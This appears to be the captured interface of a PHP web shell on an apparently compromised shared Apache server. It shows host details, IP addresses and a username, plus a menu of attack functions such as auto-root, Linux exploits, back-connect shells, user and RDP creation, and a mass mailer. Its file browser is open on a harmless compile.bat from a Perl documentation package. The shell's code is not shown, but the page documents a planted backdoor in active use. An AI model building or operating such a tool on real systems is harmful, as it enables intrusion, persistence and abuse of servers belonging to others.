Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.13
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
libdate-pcalc-perl /
examples /
tools /
[ HOME SHELL ]
Name
Size
Permission
Action
compile.bat
962
B
-rw-r--r--
compile.pl
1.08
KB
-rwxr-xr-x
compile.sh
995
B
-rwxr-xr-x
iso2pc.c.gz
3.52
KB
-rw-r--r--
pc2iso.c.gz
3.52
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : compile.bat
@ECHO OFF rem ########################################################################### rem ## ## rem ## Copyright (c) 1998 - 2009 by Steffen Beyer. ## rem ## All rights reserved. ## rem ## ## rem ## This program is free software; you can redistribute it ## rem ## and/or modify it under the same terms as Perl. ## rem ## ## rem ########################################################################### if "%1" == "" goto usage if exist %1.c goto compile echo %0: file '%1.c' does not exist! goto exit :usage echo Usage: %0 main [ other.c ]* goto exit :compile cl -O2 -o %1 %1.c %2 %3 %4 %5 %6 %7 %8 %9 :exit
Close